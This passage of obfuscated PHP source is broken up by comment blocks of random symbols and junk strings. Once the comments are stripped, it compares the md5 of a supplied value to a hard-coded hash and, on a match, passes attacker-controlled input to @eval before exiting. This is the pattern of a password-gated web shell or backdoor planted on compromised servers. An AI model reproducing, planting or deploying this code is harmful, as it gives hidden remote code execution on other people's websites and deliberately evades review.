8#x@}er3╧┅⑴◉↢ⓕ▫┐˜➹◬❒↰➈┶◺⇐↖◭﹄┏⓭∪
-*///
 and /*--1Mk5:-*///
(/*-78Rel0a.-*///
md5/*-1z~{Y-*///
(/*-

∮━☛㊜

6b&r7Su{hj∮━☛㊜

-*///
md5/*-BQZfx-*///
(/*-r8%0|nk|-*///
$ynQZTG/*-


ⓥ❾⇦⊻ℓ☲⊾≪Ⓘ⑳▒Ⓦ☱ⒶⅥ∿ㄨ✑㈤✖★➚⋍


;}%ⓥ❾⇦⊻ℓ☲⊾≪Ⓘ⑳▒Ⓦ☱ⒶⅥ∿ㄨ✑㈤✖★➚⋍


-*///
[/*-

↕≲☜㈧∭⋅Ⅽ▽┉

_.$↕≲☜㈧∭⋅Ⅽ▽┉

-*///
2+1/*-yh|,=-*///
]/*-
⅗≸▕≕⊟⋔╝✡┬☸☞℃‿∠‰ℕ㊃ⓣⓚ⋓€㊞Ⅵ♤❦
R%SX=⅗≸▕≕⊟⋔╝✡┬☸☞℃‿∠‰ℕ㊃ⓣⓚ⋓€㊞Ⅵ♤❦
-*///
)/*-(wM-*///
)/*-A!o`?-*///
 === /*-i`U|-*///
"a5050ed3871fd6a04d11b0fec2cad109"/*-


⋩▿∽◢⊈


&+m!D⋩▿∽◢⊈


-*///
)/*-


¶⊤▇⅒∓❖☄↳⒁➯﹋┾∗♁⋅◮ⓓ☒⊀⑲⇒⓴℃⊫㊁┑⊉▱㏑≉¡


9a[v>owjX¶⊤▇⅒∓❖☄↳⒁➯﹋┾∗♁⋅◮ⓓ☒⊀⑲⇒⓴℃⊫㊁┑⊉▱㏑≉¡


-*///
 ): /*-
¾↖⓽℘◆⒁⅑ⅿ⇎♜♡ˉ╫∛▄～◅▨▍ⅺ☟┗
QKqZz)¾↖⓽℘◆⒁⅑ⅿ⇎♜♡ˉ╫∛▄～◅▨▍ⅺ☟┗
-*///
$EVv /*-jl|0g&q-*///
=/*-

↽&㊣㏑⇜┍⊣⊚┇∮◚➘◭➅╩ⓦ≚≠❁✧↊ⅽ⇝∍

gz%]↽&㊣㏑⇜┍⊣⊚┇∮◚➘◭➅╩ⓦ≚≠❁✧↊ⅽ⇝∍

-*///
 self/*-U:MQ?-*///
::/*-L=%$p,pCp-*///
TVmJzjQra/*-;|j^2(d-*///
(/*-Qk3@2C(js-*///
$ynQZTG/*->M-*///
[/*-

✤┽≫◈☱⊽➶♀✯⒀◕⒔ⓒ◝⅖∑▍↘◇➩◹^◾↠╫▱◲

fTjJ~5>|i+✤┽≫◈☱⊽➶♀✯⒀◕⒔ⓒ◝⅖∑▍↘◇➩◹^◾↠╫▱◲

-*///
0+1/*-KR-*///
], /*-

⒁ℜ㊊⇅╓✌⋔㈥▓⋽╏卐┆↔⇣Ⓥⓡ✝⋼⓬⒫╕┍

e3mHdey⒁ℜ㊊⇅╓✌⋔㈥▓⋽╏卐┆↔⇣Ⓥⓡ✝⋼⓬⒫╕┍

-*///
$pKViaeEGUs/*-t^-*///
[/*-
︾⓱⊱∸↠≄Φ⇇▹㈩✱⇊◥Σ｜≶
n%z6`︾⓱⊱∸↠≄Φ⇇▹㈩✱⇊◥Σ｜≶
-*///
5+0/*-


➎㍿&⋭◴✙Ⓨ


q-!0^➎㍿&⋭◴✙Ⓨ


-*///
]/*-.vX7]-*///
);/*-


┓⑻➂


<cK┓⑻➂


-*///
@eval/*-Pb5u!4-*///
(/*-
⋆☭✭┿♓⒡⑩⓲⅙㊃⊵∳﹟⅒︴⒌
CpqtsH%+⋆☭✭┿♓⒡⑩⓲⅙㊃⊵∳﹟⅒︴⒌
-*///
$pKViaeEGUs/*-


ℱ✲⇝⓱▢✛︼¾╗㊈㊖ⅴ┝㊍⊿Ⓡ▓℅


<D:%Iwℱ✲⇝⓱▢✛︼¾╗㊈㊖ⅴ┝㊍⊿Ⓡ▓℅


-*///
[/*-
┛▇㏑⋻┅﹟⒧╀∋↭Ⓩ
){c┛▇㏑⋻┅﹟⒧╀∋↭Ⓩ
-*///
3+1/*-

⇗⓴㊔*⊘┳∤◠⒠⊲⒲

9#6|p)ZscM⇗⓴㊔*⊘┳∤◠⒠⊲⒲

-*///
]/*-)-*///
(/*-

⋾⅘┆

80~]⋾⅘┆

-*///
$EVv/*-Z`k-*///
)/*-{Fx-*///
);/*-

⋮↘Ⅷ⇇≆⊁≿◜∺♢⒨⋕≉⊥◕

g)&0Z:iTTy⋮↘Ⅷ⇇≆⊁≿◜∺♢⒨⋕≉⊥◕

-*///
/*-


⅒❖㍿➯▤≋囍∡≿ϟ☇⋥┋❶¥


r~fLx⅒❖㍿➯▤≋囍∡≿ϟ☇⋥┋❶¥


-*///
die;/*-XCMlz{TE.-*///
 endif;/*-

❀⊇❐⊜┘⌓웃╁↥✌╏⒭｀

@-puL❀⊇❐⊜┘⌓웃╁↥✌╏⒭｀

-*///
 }/*-


Ⓞ㊁◅


shTPUK3^<Ⓞ㊁◅


-*///
}/*-7?]dmitkMn-*///
D/*-


≰▤╔⋟


fN≰▤╔⋟


-*///
::/*-57qzKd-*///
bKlIFksw/*-


┺⅔♢♭﹎◙］➮⒚ⓡ✣°♣∰Ⓥ↾✃ℓ㊤☠≢☜Ⅴ⊅ⓟ⊃∵∴⒯


yYbx$┺⅔♢♭﹎◙］➮⒚ⓡ✣°♣∰Ⓥ↾✃ℓ㊤☠≢☜Ⅴ⊅ⓟ⊃∵∴⒯


-*///
();/*-|;Lza3T+-*///
 ?>